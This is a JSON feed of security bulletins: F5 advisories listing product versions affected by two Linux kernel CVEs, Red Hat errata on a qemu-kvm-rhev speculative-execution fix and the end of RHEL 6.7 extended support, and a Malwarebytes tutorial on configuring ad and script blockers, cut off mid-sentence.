{"result": {"f5": [{"lastseen": "2018-07-19T19:42:01", "references": [], "description": "\nF5 Product Development has assigned ID 734177 and 734181 (BIG-IP), ID 734624 (BIG-IQ and iWorkflow), ID 734257 (Enterprise Manager), and ID CPF-24941 and CPF-24942 (Traffix SDC) to this vulnerability.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table. For more information about security advisory versioning, refer to [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>).\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, FPS, GTM, Link Controller, PEM, WebAccelerator) | 13.x | 13.0.0 - 13.1.0 | None | Medium | [6.2](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H>) | TMOS (Linux kernel) \n12.x | 12.1.0 - 12.1.3 | None \n11.x | 11.2.1 - 11.6.3 | None \nARX | 6.x | None | Not applicable | Not vulnerable | None | None \nEnterprise Manager | 3.x | 3.1.1 | Not applicable | Medium | [6.2](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H>) | TMOS (Linux kernel) \nBIG-IQ Centralized Management | 6.x | 6.0.0 | None | Medium | [6.2](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H>) | TMOS (Linux kernel) \n5.x | 5.0.0 - 5.4.0 | None \n4.x | 4.6.0 | None \nBIG-IQ Cloud and Orchestration | 1.x | 1.0.0 | None | Medium | [6.2](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H>) | TMOS (Linux kernel) \nF5 iWorkflow | 2.x | 2.1.0 - 2.3.0 | None | Medium | [6.2](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H>) | TMOS (Linux kernel) \nTraffix SDC | 5.x | 5.0.0 - 5.1.0 | None | Medium | [6.2](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H>) | TMOS (Linux kernel) \n4.x | 4.4.0 | None \n \n1 The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Fixes introduced in** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K9502: BIG-IP hotfix and point release matrix](<https://support.f5.com/csp/article/K9502>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K15106: Managing BIG-IQ product hotfixes](<https://support.f5.com/csp/article/K15106>)\n * [K15113: BIG-IQ hotfix matrix](<https://support.f5.com/csp/article/K15113>)\n * [K12766: ARX hotfix matrix](<https://support.f5.com/csp/article/K12766>)\n * [K48955220: Installing an OPSWAT Endpoint Security update on BIG-IP APM systems (11.4.x and later)](<https://support.f5.com/csp/article/K48955220>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>)\n", "edition": 1, "reporter": "f5", "published": "2018-07-19T19:02:00", "title": "Linux kernel vulnerability CVE-2017-12190", "type": "f5", "enchantments": {"score": {"modified": "2018-07-19T19:42:01", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2017-12190"], "modified": "2018-07-19T19:02:00", "id": "F5:K93472064", "href": "https://support.f5.com/csp/article/K93472064", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-07-19T00:58:37", "references": [], "description": "\nF5 Product Development has assigned IDs 734177 and 734181 (BIG-IP), ID 725898 (BIG-IQ and iWorkflow), ID 734257 (Enterprise Manager), and CPF-24939 and CPF-24940 (Traffix SDC) to this vulnerability.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table. For more information about security advisory versioning, refer to [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>).\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, FPS, GTM, Link Controller, PEM, WebAccelerator) | 13.x | 13.0.0 - 13.1.0 | None | Medium | [5.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H>) | TMOS (Linux kernel) \n12.x | 12.1.0 - 12.1.3 | None \n11.x | 11.2.1 - 11.6.3 | None \nARX | 6.x | None | Not applicable | Not vulnerable | None | None \nEnterprise Manager | 3.x | 3.1.1 | None | Medium | [5.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H>) | TMOS (Linux kernel) \nBIG-IQ Centralized Management | 6.x | 6.0.0 | None | Medium | [5.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H>) | TMOS (Linux kernel) \n5.x | 5.0.0 - 5.4.0 \n | None \n4.x | 4.6.0 | None \nBIG-IQ Cloud and Orchestration | 1.x | 1.0.0 | None | Medium | [5.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H>) | TMOS (Linux kernel) \nF5 iWorkflow | 2.x | 2.1.0 - 2.3.0 | None | Medium | [5.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H>) | TMOS (Linux kernel) \nTraffix SDC | 5.x | 5.0.0 - 5.1.0 | None | Medium | [5.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H>) | TMOS (Linux kernel) \n4.x | 4.4.0 | None \n \n1 The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Fixes introduced in** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K9502: BIG-IP hotfix and point release matrix](<https://support.f5.com/csp/article/K9502>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K15106: Managing BIG-IQ product hotfixes](<https://support.f5.com/csp/article/K15106>)\n * [K15113: BIG-IQ hotfix matrix](<https://support.f5.com/csp/article/K15113>)\n * [K48955220: Installing an OPSWAT Endpoint Security update on BIG-IP APM systems (11.4.x and later)](<https://support.f5.com/csp/article/K48955220>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>)\n", "edition": 1, "reporter": "f5", "published": "2018-07-18T17:14:00", "title": "Linux kernel vulnerability CVE-2017-15121", "type": "f5", "enchantments": {"score": {"modified": "2018-07-19T00:58:37", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2017-15121"], "modified": "2018-07-18T20:20:00", "id": "F5:K42142782", "href": "https://support.f5.com/csp/article/K42142782", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-07-19T14:55:58", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.10.0-21.el7_5.4", "arch": "ppc64le", "packageName": "qemu-img-rhev", "packageFilename": "qemu-img-rhev-2.10.0-21.el7_5.4.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.10.0-21.el7_5.4", "arch": "x86_64", "packageName": "qemu-img-rhev", "packageFilename": "qemu-img-rhev-2.10.0-21.el7_5.4.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.10.0-21.el7_5.4", "arch": "ppc64le", "packageName": "qemu-kvm-common-rhev", "packageFilename": "qemu-kvm-common-rhev-2.10.0-21.el7_5.4.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.10.0-21.el7_5.4", "arch": "x86_64", "packageName": "qemu-kvm-common-rhev", "packageFilename": "qemu-kvm-common-rhev-2.10.0-21.el7_5.4.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.10.0-21.el7_5.4", "arch": "ppc64le", "packageName": "qemu-kvm-rhev", "packageFilename": "qemu-kvm-rhev-2.10.0-21.el7_5.4.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.10.0-21.el7_5.4", "arch": "src", "packageName": "qemu-kvm-rhev", "packageFilename": "qemu-kvm-rhev-2.10.0-21.el7_5.4.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.10.0-21.el7_5.4", "arch": "x86_64", "packageName": "qemu-kvm-rhev", "packageFilename": "qemu-kvm-rhev-2.10.0-21.el7_5.4.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.10.0-21.el7_5.4", "arch": "ppc64le", "packageName": "qemu-kvm-rhev-debuginfo", "packageFilename": "qemu-kvm-rhev-debuginfo-2.10.0-21.el7_5.4.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.10.0-21.el7_5.4", "arch": "x86_64", "packageName": "qemu-kvm-rhev-debuginfo", "packageFilename": "qemu-kvm-rhev-debuginfo-2.10.0-21.el7_5.4.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.10.0-21.el7_5.4", "arch": "ppc64le", "packageName": "qemu-kvm-tools-rhev", "packageFilename": "qemu-kvm-tools-rhev-2.10.0-21.el7_5.4.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.10.0-21.el7_5.4", "arch": "x86_64", "packageName": "qemu-kvm-tools-rhev", "packageFilename": "qemu-kvm-tools-rhev-2.10.0-21.el7_5.4.x86_64.rpm", "operator": "lt"}], "description": "KVM (Kernel-based Virtual Machine) is a full virtualization solution for Linux on a variety of architectures. The qemu-kvm-rhev packages provide the user-space component for running virtual machines that use KVM in environments managed by Red Hat products.\n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3639)\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response Center) and Jann Horn (Google Project Zero) for reporting this issue.\n\nNote: This is the qemu-kvm-rhev side of the CVE-2018-3639 mitigation that includes support for guests running on hosts with AMD processors.\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "reporter": "RedHat", "published": "2018-07-19T17:42:12", "type": "redhat", "title": "(RHSA-2018:2228) Important: qemu-kvm-rhev security update", "enchantments": {"score": {"modified": "2018-07-19T14:55:58", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-3639"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-07-19T17:43:24", "id": "RHSA-2018:2228", "href": "https://access.redhat.com/errata/RHSA-2018:2228", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-07-19T11:21:11", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "6ComputeNode-6.7.0.5.el6_7.2", "arch": "src", "packageName": "redhat-release-computenode", "packageFilename": "redhat-release-computenode-6ComputeNode-6.7.0.5.el6_7.2.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6ComputeNode-6.7.0.5.el6_7.2", "arch": "x86_64", "packageName": "redhat-release-computenode", "packageFilename": "redhat-release-computenode-6ComputeNode-6.7.0.5.el6_7.2.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6Server-6.7.0.5.el6_7.1", "arch": "i686", "packageName": "redhat-release-server", "packageFilename": "redhat-release-server-6Server-6.7.0.5.el6_7.1.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6Server-6.7.0.5.el6_7.1", "arch": "ppc64", "packageName": "redhat-release-server", "packageFilename": "redhat-release-server-6Server-6.7.0.5.el6_7.1.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6Server-6.7.0.5.el6_7.1", "arch": "s390x", "packageName": "redhat-release-server", "packageFilename": "redhat-release-server-6Server-6.7.0.5.el6_7.1.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6Server-6.7.0.5.el6_7.1", "arch": "src", "packageName": "redhat-release-server", "packageFilename": "redhat-release-server-6Server-6.7.0.5.el6_7.1.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "6Server-6.7.0.5.el6_7.1", "arch": "x86_64", "packageName": "redhat-release-server", "packageFilename": "redhat-release-server-6Server-6.7.0.5.el6_7.1.x86_64.rpm", "operator": "lt"}], "description": "In accordance with the Red Hat Enterprise Linux Errata Support Policy, Extended Update Support for Red Hat Enterprise Linux 6.7 will be retired as of December 31, 2018, and active support will no longer be provided. Accordingly, Red Hat will no longer provide updated packages, including Critical Impact security patches or Urgent Priority bug fixes, for Red Hat Enterprise Linux 6.7 EUS after December 31, 2018. In addition, on-going technical support through Red Hat's Customer Experience and Engagement will be limited as described under \"non-current minor releases\" in the Knowledge Base article located here https://access.redhat.com/articles/64664 after this date.\n\nWe encourage customers to migrate from Red Hat Enterprise Linux 6.7 to a more recent version of Red Hat Enterprise Linux. As a benefit of the Red Hat subscription model, customers can use their active subscriptions to entitle any system on any currently supported Red Hat Enterprise Linux release.\n\nDetails of the Red Hat Enterprise Linux life cycle can be found here: https://access.redhat.com/support/policy/updates/errata/", "reporter": "RedHat", "published": "2018-07-19T15:10:39", "type": "redhat", "title": "(RHSA-2018:2224) Low: Red Hat Enterprise Linux 6.7 Extended Update Support Six-Month Notice", "enchantments": {"score": {"modified": "2018-07-19T11:21:11", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": [], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-07-19T15:12:11", "id": "RHSA-2018:2224", "href": "https://access.redhat.com/errata/RHSA-2018:2224", "cvss": {"score": 0.0, "vector": "NONE"}}], "malwarebytes": [{"lastseen": "2018-07-19T20:45:35", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "_In [part one](<https://blog.malwarebytes.com/security-world/privacy-security-world/2018/07/mother-is-blocking-ads-so-why-arent-you/>) of this series, we had a look at a few reasons why you should be blocking online advertisements on your network and devices. From malvertising attacks and privacy-invading tracking systems to just being an outright annoyance, online ads and trackers are a nuisance that provides an attack vector for malware authors, compromise user security, and plainly, diminish the browsing experience._\n\n_In the second part of this series, we\u2019ll cover a few of the common ad blocking utilities and how to best configure those tools for maximum effectiveness. We\u2019ll take a look at tools that are easy enough to set up and run on mom\u2019s computer, as well as a few tools that may require a bit more expertise. And later on, we\u2019ll discuss a few tools that do a great job of blocking ads and protecting your privacy, but may require a shift in mindset before realizing the benefit. _\n\n_So, go grab your cup of Joe, sit back, and dive into the conclusion of \u201cEverybody and their mother is blocking ads, so why aren\u2019t you?\u201d_\n\n### A note about filter lists\n\nYou\u2019ve read the reasons why it\u2019s important to have a robust ad blocking policy on your network. You understand the risks that are posed by malvertising attacks and data-sucking exchange networks. You now want to configure ad blocking within your own network\u2014but where do you start? Your first stop is to look at filter lists.\n\nSeveral of the tools we\u2019ll cover use sets of rules, known as filter lists, to help determine what should be blocked. These lists are created by individuals, open-source communities, and private organizations. Popular websites to obtain filter lists include the [Adblock Plus subscription page](<https://adblockplus.org/subscriptions>) and [Filterlists.com](<https://filterlists.com/>).\n\nSome filter lists can include specific, narrow qualifiers such as \u201ccoin miners,\" while others are comprised of large subsets of data targeting multiple facets of advertising and tracking. Filter lists are also broken out into languages to help block ads in various regions.\n\nWhen the browser requests a website, that site\u2014and all the domains requested by that site\u2014are checked against the filter list prior to being displayed. If a domain is on the filter list, then the ad blocker won\u2019t allow the information to pass, effectively blocking the content. But, too many filter lists will result in too many look-ups. This results in a slowing of the browser and increased response times of websites. Users should be mindful when adding filters lists as to not add more than is required and not add duplicate lists.\n\n### Adblock Plus\n\nThe popular ad blocking extension made by Eyeo is the simplest and most popular of the tools we\u2019ll cover\u2014and it\u2019s easy to see why. Adblock Plus has been blocking banner pop-ups, advertisements, and trackers for the last 12 years. The browser extension works in popular browsers such as [Chromium](<https://chrome.google.com/webstore/detail/adblock-plus/cfhdojbkjhnklbpkdaibdccddilifddb>), [Mozilla](<https://addons.mozilla.org/en-US/firefox/addon/adblock-plus/>), and [Safari](<https://safari-extensions.apple.com/details/?id=org.adblockplus.adblockplussafari-GRYYZR985A>), and is easily configured to block a variety of threats. Adblock Plus runs with minimal interruption on PCs (and yes, this is actually configured on my mom\u2019s PC). The company even has its own Adblock Plus browser that can be used on mobile devices (more on this later).\n\nThough Adblock Plus works out-of-the-box without any other configurations needed, it\u2019s best to dive into the settings to make a few adjustments.\n\n#### Download\n\n\n\nAfter using one of the previous links to install Adblock Plus to your preferred browser, the options menu can be accessed by clicking the red ABP icon that appears at the top of the browser. From there, click the **Options** button at the bottom of the window. \n\n\nAdblock Plus encourages publishers to join their [Acceptable Ads program](<https://adblockplus.org/acceptable-ads>). The Acceptable Ads program allows publishers who adhere to a prescribed set of guidelines an opportunity to have their ads shown to users who are using Adblock Plus. While this feature has caused a [bit of flak](<https://sricks.com/please-stop-using-adblock/>) for the company, the subsequent creation of the Acceptable Ads Committee has helped create a dialogue surrounding responsible advertising.\n\nWhile those things are fine and dandy for publishers, we\u2019re looking to block advertisements, so let\u2019s disable those \"acceptable\" ads.\n\n#### Set up\n\nFrom within the General tab of the Settings window, uncheck the option for **Allow Acceptable Ads**. This will also be a good time to enable the Privacy and Security settings for **Block additional tracking** and **Block social media icons tracking.** Both settings will help prevent trackers from harvesting information about your browsing session (since social media buttons are used to [track user behavior](<https://thenextweb.com/security/2018/06/09/adblock-plus-now-blocks-social-media-tracking-for-chrome-firefox/>)).\n\n\n\nThe default filter lists are shown under the advanced tab. Adblock Plus comes pre-loaded with several popular lists, including: EasyList and Fanboy\u2019s Social Block List. Additional filters can be downloaded and installed from the [Adblock Plus subscription page](<https://adblockplus.org/subscriptions>), but the default lists will sufficiently weigh function and convenience to provide a modest ad blocking experience.\n\n\n\n#### Test\n\nThat\u2019s it! Just a few clicks are all that is required to get a baseline setup of Adblock Plus. Let\u2019s test it out and see how it looks.\n\n\n\nThat\u2019s pretty cool, huh? The advertisements in videos, articles, and search results are all removed. And because the ad content isn\u2019t being displayed, the page response time is faster and the desired content is reduced to a smaller portion of the landscape. This reduces the time spent scrolling around the page.\n\n#### Sometimes it doesn't work\n\nThough Adblock Plus works great to block ads on most websites, sometimes it may not. Ads may find their way onto the page, or notices may be shown advising to disable the ad blocker.\n\n\n\nIndeed should the need arise, Adblock Plus is easy to disable simply by clicking the ABP logo and then clicking the check mark to disable/enable the service.\n\n\n\nBut this post is about blocking ads, not succumbing to the pressures of aggressive advertisers. And though it may be possible to configure Adblock Plus to block the majority of these ads and trackers, advanced users may prefer to use a solution which allows for more granularity and greater control over the page elements and individual page frames.\n\n### uBlock Origin\n\nuBlock Origin, which is not to be confused with \u00b5Block, is another browser-based plugin, which is available for both Chromium and Mozilla browsers. Like Adblock Plus, the product is widely popular and utilizes a variety of filter lists to help block advertisement and trackers. Unlike Adblock Plus, however, uBlock Origin is an open-source project, which helps to boost the popularity of the product and helps the company to remain free from the outside influence of advertisers and publishers.\n\nThough uBlock Origin works well at its intended purpose, the product may not be suitable for all users due to the technical nature of the program and difficulty in navigating its user interface (UI). Some have [complained](<https://www.neowin.net/forum/topic/1330538-disable-ublock-origins-has-prevented-the-following-page-from-loading-temporarilypermanently-screen/>) about the increase in support cases due to the installation of the program from users who may not understand why their webpages don't look the same. But for those who understand the advertising landscape and the potential for blocking ads to cause trouble, then uBlock Origin [appears](<http://3dinsider.com/adblock-plus-vs-ublock-origin/>) to be a [preferred](<https://www.thedroidway.com/ublock-origin-vs-adblock-plus/>) choice.\n\n#### Download\n\n\n\nInstalling uBlock Origin is an almost identical process to installing Adblock Plus. Just head over to the [Mozilla Add-ons](<https://addons.mozilla.org/en-US/firefox/addon/ublock-origin/>) page, [Chrome Web Store](<https://chrome.google.com/webstore/detail/ublock-origin/cjpalhdlnbpafiamejdnhcphjbkeiagm?hl=en>), or [Safari extensions page](<https://safari-extensions.apple.com/details/?id=com.el1t.uBlock-3NU33NW2M3>) to grab a free copy of the software, and click the buttons to install the extension.\n\nAfter installing uBlock Origin, a red icon will appear in the top right of the browser window. Options can be configured from this icon. Though uBlock Origin works well in the default state, we\u2019ll take a look at the settings and configurations and make a few changes to help block some of the previously missed elements.\n\n#### Set up\n\nClicking the uBlock Origin icon will open the panel window. The big blue button can be used to easily turn uBlock Origin off and on. The settings icon looks like a slider bar and will open the settings dashboard.\n\n\n\n \n\nAfter opening the uBlock Origin dashboard, users are presented with a window with various tabs. There aren\u2019t any configuration changes required, and the only setting worth noting is **I am an advanced user**, which will be discussed later.\n\nOne area uBlock Origin stands out above the competition is the inclusion of various filter lists. These lists can be enabled and disabled as necessary to allow a quick mechanism to block ads and trackers, but also malware, scam sites, and other annoying website elements. Though the defaults are pretty good, we\u2019re going to add a few more lists to improve the blocking capabilities.\n\nIn addition to the default lists, the following lists will also be enabled:\n\n * uBlock filers \u2013 Annoyances\n * Adblock Warning Removal List\n * Malvertising filter list by Disconnect\n * Spam404\n * Fanboy\u2019s Annoyance List\n * Fanboy\u2019s Social Blocking List\n * hpHosts Ad and tracking servers\n\nOnce all are enabled, click the **Apply changes** button to save the settings, and then the **Update now button** to update the lists.\n\n\n\n#### Test\n\n \nuBlock Origin is configured to use most of the same filter lists as have been configured for Adblock Plus, so many of the same ads will be blocked as before. The inclusion of the additional filter lists will help to exclude some of the web elements that were previously remaining.\n\n\n\n#### More difficult\n\nEven with strict filtering, not all advertisements will be blocked. There are still videos that auto play from websites, or advertisements hosted on the visited site instead of from a known third-party advertiser. For these types of ads, it's best to create custom rules to block the individual elements on the page.\n\nRight-click the advertisement\u2014or section of the page where the ad appears\u2014and choose the block option. A window will appear allowing the rule to be previewed before creation. Click the create button, and the only thing we're left watching is that video disappear!\n\n\n\nElements can also be blocked by clicking the uBlock Origin icon and using element zapper or element picker. The difference between these two is that the element zapper is temporary and only removes the element until the session is closed. Element picker adds the element code to the block list so that it will also be blocked on future visits.\n\n\n\nThis feature can be used to remove the empty element that remains on the previously examined page. Simply open uBlock Origin and click the Element Picker icon. Carefully select only the desired area of the page to be blocked. Be sure to use the preview option prior to creating the rule to ensure the block works as intended. After verifying, create the rule to remove the desired frame.\n\n\n\n#### Advanced\n\n\n\nThere is nothing worse than opening a bunch of tabs only to later find one of them playing video from a small screen sequestered to the corner of a window. Sure, these elements can be blocked on an individual basis, but technically savvy users may desire a blanket approach to prevention. For that, uBlock Origin offers script blocking.\n\nuBlock Origin logs all script activity on a webpage for analysis. Looking at the information helps reveal the number of trackers and ad networks in use on a particular website.\n\nTo use the logger feature, open the uBlock Origin panel and click the Logger icon. The logger window will appear. Press the refresh button to start the logger and reload the page. Information about the website will be logged to the window.\n\n\n\nThe blocking of web scripts tends to leave some websites lacking in functionality or just plain unusable. Blocking scripts should be reserved for those who understand the complications to be expected. The problematic nature prompted uBlock Origin to hide the feature behind the setting titled **I am an advanced user**. To gain full access to the settings, users must click the link for **required reading**.\n\n\n\nAfter enabling the setting and reading the document, new options will appear within the uBlock Origin dashboard. The new options give users the ability to block first- and third-party scripts, as well as set individual policies per website.\n\nGroup settings based off script source will be displayed on top (red section), while the websites being called will appear below (blue section).\n\n\n\nThe two columns to the right of the names are used to define global (left) and local (right) policies. The combination of the two columns allows for a varying mixture of blocking capabilities.\n\nFor example, uBlock Origin can be configured to block all third-party scripts and frames, but first-party scripts will be blocked ONLY on the local site, since blocking first-party scripts globally will lead to problems loading webpages elsewhere.\n\n\n\nChanges can be previewed by clicking the refresh circle. After verifying the changes, save the settings by clicking the lock icon at the top of the screen.\n\nThe resulting effect is that the auto-playing news story has now disappeared from all webpages on this site.\n\n\n\nNot only did this stop the video, but if we go back and look at the logger, we see that all of the third-party scripts that were previously allowed are now being blocked.\n\n\n\nBlocking scripts is one of the most effective mechanisms to block ads and invisible trackers, but will lead to unintended results. Those who are interested in experimenting with script blocking\u2014and who [find the uBlock Origin UI intimidating](<https://forums.anandtech.com/threads/ublock-origin-ui-documentation.2450043/>)\u2014may find solace in the simplicity of the next plugin on our list.\n\n### A note about scripts\n\nWebsite scripts come in a variety of forms including JavaScript, Java, and Flash. These scripting languages are used for advertising and tracking, but also to make the internet function.\n\nVideos and graphics may be produced with scripting code. Webpage content may also be generated using these languages. Comment sections and other social media content are produced with scripting languages. As a result, users should expect the following:\n\nBlocking scripts by default **WILL** cause some websites to fail.\n\nBlocking scripts by default **WILL** prevent some content from loading.\n\nUsers who decide to implement global script-blocking policies will need to be aware of the potential issues and how to resolve such issues when they occur. Having an understanding of the domain landscapes and being able to analyze the necessary domains to enable desired content will also be needed. Simply whitelisting all websites will negate the value of blocking scripts, so understanding the how-to and why is important.\n\n### NoScript Security Suite\n\nNoScript is a browser-based plugin for Mozilla browsers only. There is an alternative for Chromium called [ScriptSafe](<https://chrome.google.com/webstore/detail/scriptsafe/oiigbmnaadbkfbmpbfijlflahbdbdgdf?hl=en-US>), and Safari users have [JS Blocker](<https://safari-extensions.apple.com/details/?id=com.toggleable.JavaScriptBlocker5-6S8J5HV3H4>). Both will work similarly.\n\nNoScript provides an extra layer of protection by ensuring that scripting code such as Java, JavaScript, and Flash is only executed by trusted websites. Blocking scripting languages from running on untrusted websites will prevent ads, trackers, and other forms of undesirable activity from occurring.\n\nIn addition to blocking scripts, NoScript comes with a robust set of anti-cross-site-scripting ([XSS](<https://en.wikipedia.org/wiki/Cross-site_scripting>)) and [clickjacking](<https://blog.malwarebytes.com/cybercrime/2016/06/malvertising-campaign-leads-to-doubleclick-ad-fraud/>) protections to help prevent malicious actions and undesirable redirects.\n\nNoScript and other script blockers are recommended for advanced users who understand the risks.\n\n\n\n#### Download\n\nThe process is no different for NoScript than any other plugin. Jump over to the [Mozilla Add-ons page](<https://addons.mozilla.org/en-US/firefox/addon/noscript/>) and install the extension to the browser.\n\n\n\nNoScript requires absolutely no setup and will begin working immediately after being installed. Unlike the other extensions we\u2019ve covered, there is no way to disable NoScript. If users need to disable the plugin, it must be done through the Mozilla add-on [configuration panel](<addons>).\n\n\n\n#### Using NoScript\n\nUsers may immediately notice a difference to their browsing experience after installing NoScript. Videos and gifs may not load correctly, content may not appear, or worse, pages may fail to load altogether. Though this sounds 